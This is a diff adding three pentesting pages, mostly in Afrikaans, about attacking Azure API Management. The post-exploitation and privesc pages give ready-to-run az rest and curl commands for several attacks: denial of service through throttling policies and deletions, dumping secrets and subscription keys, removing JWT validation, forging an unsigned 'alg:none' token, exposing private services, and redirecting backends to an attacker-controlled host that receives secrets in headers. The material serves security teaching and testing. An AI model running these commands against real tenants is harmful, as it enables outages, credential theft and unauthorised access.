Translated ['src/pentesting-cloud/azure-security/az-services/az-api-mana

src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md

@@ -0,0 +1,75 @@
+# Azure - API Management Post-Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+##  `Microsoft.ApiManagement/service/apis/policies/write` or `Microsoft.ApiManagement/service/policies/write`
+Die aanvaller kan verskeie vektore gebruik om 'n denial of service te veroorsaak. Om wettige verkeer te blokkeer, voeg die aanvaller rate-limiting en quota policies met uiters lae waardes by, wat effektief normale toegang voorkom:
+```bash
+az rest --method PUT \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
+--headers "Content-Type=application/json" \
+--body '{
+"properties": {
+"format": "rawxml",
+"value": "<policies><inbound><rate-limit calls=\"1\" renewal-period=\"3600\" /><quota calls=\"10\" renewal-period=\"86400\" /><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
+}
+}'
+```
+Om spesifieke regmatige kliënt-IP-adresse te blokkeer, kan die aanvaller IP-filtreringsbeleide byvoeg wat versoeke vanaf geselekteerde adresse verwerp:
+```bash
+az rest --method PUT \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
+--headers "Content-Type=application/json" \
+--body '{
+"properties": {
+"format": "rawxml",
+"value": "<policies><inbound><ip-filter action=\"forbid\"><address>1.2.3.4</address><address>1.2.3.5</address></ip-filter><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
+}
+}'
+```
+## `Microsoft.ApiManagement/service/backends/write` or `Microsoft.ApiManagement/service/backends/delete`
+Om versoeke te laat misluk, kan die aanvaller 'n backend-konfigurasie wysig en die URL daarvan na 'n ongeldig of ontoeganklike adres verander:
+```bash
+az rest --method PUT \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
+--headers "Content-Type=application/json" "If-Match=*" \
+--body '{
+"properties": {
+"url": "https://invalid-backend-that-does-not-exist.com",
+"protocol": "http"
+}
+}'
+```
+Of verwyder backends:
+```bash
+az rest --method DELETE \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
+--headers "If-Match=*"
+```
+## `Microsoft.ApiManagement/service/apis/delete`
+Om kritieke APIs onbeskikbaar te maak, kan die aanvaller dit direk vanaf die API Management service verwyder:
+```bash
+az rest --method DELETE \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>?api-version=2024-05-01" \
+--headers "If-Match=*"
+```
+## `Microsoft.ApiManagement/service/write` or `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`
+Om toegang vanaf die Internet te blokkeer, kan die aanvaller openbare netwerktoegang op die API Management service afskakel:
+```bash
+az rest --method PATCH \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01" \
+--headers "Content-Type=application/json" \
+--body '{
+"properties": {
+"publicNetworkAccess": "Disabled"
+}
+}'
+```
+## `Microsoft.ApiManagement/service/subscriptions/delete`
+Om toegang vir wettige gebruikers te blokkeer, kan die aanvaller API Management-subskripsies verwyder:
+```bash
+az rest --method DELETE \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<apim-subscription-id>?api-version=2024-05-01" \
+--headers "If-Match=*"
+```
+{{#include ../../../banners/hacktricks-training.md}}

src/pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md

@@ -0,0 +1,170 @@
+# Az - API Management Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## `Microsoft.ApiManagement/service/namedValues/read` & `Microsoft.ApiManagement/service/namedValues/listValue/action`
+
+Die aanval behels toegang tot sensitiewe geheime wat in Azure API Management Named Values gestoor is, hetsy deur direk geheime waardes te kry of deur permissies te misbruik om Key Vault–ondersteunde geheime via managed identities te bekom.
+```bash
+az apim nv show-secret --resource-group <resource-group> --service-name <service-name> --named-value-id <named-value-id>
+```
+## `Microsoft.ApiManagement/service/subscriptions/read` & `Microsoft.ApiManagement/service/subscriptions/listSecrets/action`
+Vir elke subscription kan die aanvaller die subscription keys bekom deur die listSecrets endpoint met die POST-metode te gebruik:
+```bash
+az rest --method POST \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<subscription-sid>/listSecrets?api-version=2024-05-01"
+```
+Die response bevat die subscription primary key (primaryKey) en secondary key (secondaryKey). Met hierdie sleutels kan die attacker autentiseer en toegang kry tot die APIs wat deur die API Management Gateway gepubliseer is:
+```bash
+curl -H "Ocp-Apim-Subscription-Key: <primary-key-or-secondary-key>" \
+https://<service-name>.azure-api.net/<api-path>
+```
+Die aanvaller kan toegang kry tot alle APIs en produkte wat met die subskripsie geassosieer is. As die subskripsie toegang het tot sensitiewe produkte of APIs, kan die aanvaller vertroulike inligting bekom of ongemagtigde operasies uitvoer.
+
+## `Microsoft.ApiManagement/service/policies/write` or `Microsoft.ApiManagement/service/apis/policies/write`
+
+Die aanvaller haal eers die huidige API-beleid op:
+```bash
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/?api-version=2024-05-01&format=rawxml"
+```
+Die attacker kan die policy op verskeie maniere wysig, afhangend van hul doelwitte. Byvoorbeeld, om authentication uit te skakel, as die policy JWT token validation insluit, kan die attacker daardie gedeelte verwyder of uitkommenteer:
+```xml
+<policies>
+<inbound>
+<base />
+<!-- JWT validation removed by the attacker -->
+<!-- <validate-jwt header-name="Authorization" failed-validation-httpcode="401" >
+...
+</validate-jwt> -->
+</inbound>
+<backend>
+<base />
+</backend>
+<outbound>
+<base />
+</outbound>
+<on-error>
+<base />
+</on-error>
+</policies>
+```
+Om rate limiting controls te verwyder en denial-of-service attacks toe te laat, kan die attacker die quota en rate-limit policies verwyder of uitkommenteer:
+```xml
+<policies>
+<inbound>
+<base />
+<!-- Rate limiting removed by the attacker -->
+<!-- <rate-limit calls="100" renewal-period="60" />
+<quota-by-key calls="1000" renewal-period="3600" counter-key="@(context.Subscription.Id)" /> -->
+</inbound>
+...
+</policies>
+```
+Om die backend-roete te wysig en verkeer na 'n deur die aanvaller beheerde bediener om te herlei:
+```xml
+<policies>
+...
+<inbound>
+<base />
+<set-backend-service base-url="https://attacker-controlled-server.com" />
+</inbound>
+...
+</policies>
+```
+Die aanvaller pas dan die gewysigde beleid toe. The request body must be a JSON object containing the policy in XML format:
+```bash
+az rest --method PUT \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
+--headers "Content-Type=application/json" \
+--body '{
+"properties": {
+"format": "rawxml",
+"value": "<policies><inbound><base /></inbound><backend><base /></backend><outbound><base /></outbound><on-error><base /></on-error></policies>"
+}
+}'
+```
+## JWT Validation Misconfiguration
+
+Die attacker moet weet dat 'n API JWT token validation gebruik en dat die policy misgekonfigureer is. Swak gekonfigureerde JWT validation policies kan `require-signed-tokens="false"` of `require-expiration-time="false"` hê, wat die service toelaat om unsigned tokens of tokens wat nooit verval nie te aanvaar.
+
+Die attacker skep 'n malicious JWT token met die none algorithm (unsigned):
+```
+# Header: {"alg":"none"}
+# Payload: {"sub":"user"}
+eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0.
+```
+Die aanvaller stuur 'n versoek na die API met die kwaadwillige token:
+```bash
+curl -X GET \
+-H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0." \
+https://<apim>.azure-api.net/path
+```
+As die beleid verkeerd gekonfigureer is met `require-signed-tokens="false"`, sal die diens die ongetekende token aanvaar. Die attacker kan ook 'n token skep sonder 'n expiration claim as `require-expiration-time="false"`.
+
+## `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`
+Die attacker kontroleer eers die huidige netwerkkonfigurasie van die diens:
+```bash
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"
+```
+Die aanvaller ondersoek die JSON-antwoord om die waardes van `publicNetworkAccess` en `virtualNetworkType` te verifieer. As `publicNetworkAccess` op false gestel is of `virtualNetworkType` op Internal gestel is, is die diens gekonfigureer vir privaat toegang.
+
+Om die diens na die Internet bloot te stel, moet die aanvaller albei instellings verander. As die diens in internal-modus loop (`virtualNetworkType: "Internal"`), verander die aanvaller dit na None of External en skakel publieke netwerktoegang aan. Dit kan gedoen word met die Azure Management API:
+```bash
+az rest --method PATCH \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01" \
+--headers "Content-Type=application/json" \
+--body '{
+"properties": {
+"publicNetworkAccess": "Enabled",
+"virtualNetworkType": "None"
+}
+}'
+```
+Sodra `virtualNetworkType` op `None` of `External` gestel is en `publicNetworkAccess` geaktiveer is, raak die diens en al sy APIs vanaf die Internet toeganklik, selfs al was hulle voorheen beskerm agter 'n privaat netwerk of private eindpunte.
+
+## `Microsoft.ApiManagement/service/backends/write`
+Die aanvaller tel eers die bestaande backends op om te bepaal watter een om te wysig:
+```bash
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"
+```
+Die aanvaller haal die huidige konfigurasie van die backend wat hulle wil wysig op:
+```bash
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"
+```
+Die aanvaller verander die backend URL sodat dit na 'n bediener onder hul beheer wys. Eerstens verkry hulle die ETag uit die vorige antwoord en werk dan die backend by:
+```bash
+az rest --method PUT \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
+--headers "Content-Type=application/json" "If-Match=*" \
+--body '{
+"properties": {
+"url": "https://attacker-controlled-server.com",
+"protocol": "http",
+"description": "Backend modified by attacker"
+}
+}'
+```
+Alternatiewelik kan die aanvaller backend headers konfigureer om Named Values wat geheime bevat uit te eksfiltreer. Dit word gedoen deur die backend credentials configuration:
+```bash
+az rest --method PUT \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
+--headers "Content-Type=application/json" "If-Match=*" \
+--body '{
+"properties": {
+"url": "https://attacker-controlled-server.com",
+"protocol": "http",
+"credentials": {
+"header": {
+"X-Secret-Value": ["{{named-value-secret}}"]
+}
+}
+}
+}'
+```
+Met hierdie konfigurasie word Named Values as headers in alle requests na die attacker-controlled backend gestuur, wat die exfiltration van sensitiewe secrets moontlik maak.
+
+{{#include ../../../banners/hacktricks-training.md}}

src/pentesting-cloud/azure-security/az-services/az-api-management.md

@@ -0,0 +1,74 @@
+# Az - API Management
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basiese Inligting
+
+Azure API Management (APIM) is 'n volledig bestuurde diens wat 'n **geïntegreerde platform vir publisering, beveiliging, transformasie, bestuur en monitering van APIs** bied. Dit stel organisasies in staat om hul **API-strategie te sentraliseer** en konsekwente governance, prestasie en sekuriteit oor al hul dienste te verseker. Deur as 'n abstraksielaag tussen backend services en API-konsumante te funksioneer, vereenvoudig APIM integrasie en verbeter dit instandhouding, terwyl dit noodsaaklike operasionele en sekuriteitsvermoëns verskaf.
+
+## Kernkonsepte
+
+**The API Gateway** dien as die enkele toegangspunt vir alle API-verkeer en hanteer funksies soos die routering van versoeke na backend services, die afdwinging van rate-limiete, die kasbewaring van antwoorde, en die bestuur van verifikasie en magtiging. Hierdie gateway word volledig deur Azure aangebied en bestuur, wat hoë beskikbaarheid en skaalbaarheid verseker.
+
+**The Developer Portal** bied 'n selfdiensomgewing waar API-konsumante beskikbare APIs kan ontdek, dokumentasie kan lees en eindpunte kan toets. Dit help om onboarding te stroomlyn deur interaktiewe gereedskap en toegang tot subscription information te bied.
+
+**The Management Portal (Management Plane)** word deur administrators gebruik om die APIM-diens te konfigureer en te onderhou. Van hier af kan gebruikers APIs en operasies definieer, toegangbeheer konfigureer, policies toepas, gebruikers bestuur en APIs in products organiseer. Hierdie portaal sentraliseer administrasie en verseker konsekwente API-governance.
+
+## Verifikasie en Magtiging
+
+Azure API Management ondersteun verskeie **verifikasie-meganismes** om API-toegang te beveilig. Hierdie sluit in **subscription keys**, **OAuth 2.0 tokens**, en **client certificates**. APIM integreer ook native met **Microsoft Entra ID**, wat ondernemingsvlak identiteitbestuur en veilige toegang tot beide APIs en backend services moontlik maak.
+
+## Policies
+
+Policies in APIM laat administrators toe om die verwerking van versoeke en antwoorde op verskeie granulariteite aan te pas, insluitend die vlak van die **service**, **API**, **operation**, of **product**. Deur policies kan mens **JWT token validation** afdwing, XML- of JSON-payloads transformeer, rate limiting toepas, oproepe per IP-adres beperk, of verifieer teen backend services met behulp van **managed identities**. Policies is uiters buigbaar en vorm een van die kernsterktes van die API Management-platform, wat fynkorrelige beheer oor runtime-gedrag moontlik maak sonder om backend-kode te wysig.
+
+## Named Values
+
+Die diens bied 'n meganisme genaamd **Named Values**, wat toelaat om **konfigurasie-inligting** soos **secrets**, **API keys**, of ander waardes wat deur policies benodig word, te stoor.
+
+Hierdie waardes kan direk binne APIM gestoor word of veilig vanaf **Azure Key Vault** verwys word. Named Values bevorder die **veilige en gesentraliseerde bestuur** van konfigurasiedata en vereenvoudig die skryf van policies deur **herbruikbare verwysings** toe te laat in plaas van hardgekodeerde waardes.
+
+## Netwerk- en Sekuriteitsintegrasie
+
+Azure API Management integreer naatloos met **virtual network environments**, wat private en veilige konnektiwiteit na backend-stelsels moontlik maak.
+
+Wanneer dit binne 'n **Virtual Network (VNet)** ontplooi word, kan APIM toegang kry tot **internal services** sonder om hulle publiek bloot te stel. Die diens laat ook die konfigurasie van **custom certificates** toe om **mutual TLS authentication** met backend services te ondersteun, wat sekuriteit verbeter in scenario's waar **sterk identiteitsverifikasie** vereis word.
+
+Hierdie **networking features** maak APIM geskik vir beide **cloud-native** en **hybrid architectures**.
+
+### Enumereer
+
+Om die API Management-diens te enumereer:
+```bash
+# Lists all Named Values configured in the Azure API Management instance
+az apim nv list --resource-group <resource-group> --service-name <service-name>
+
+# Retrieves all policies applied at the API level in raw XML format
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/?api-version=2024-05-01&format=rawxml"
+
+# Retrieves the effective policy for a specific API in raw XML format
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01&format=rawxml"
+
+# Gets the configuration details of the APIM service instance
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"
+
+# Lists all backend services registered in the APIM instance
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"
+
+# Retrieves details of a specific backend service
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"
+
+# Gets general information about the APIM service
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01"
+
+# Calls an exposed API endpoint through the APIM gateway
+curl https://<apim>.azure-api.net/<api-path>
+
+```
+{{#include ../../../banners/hacktricks-training.md}}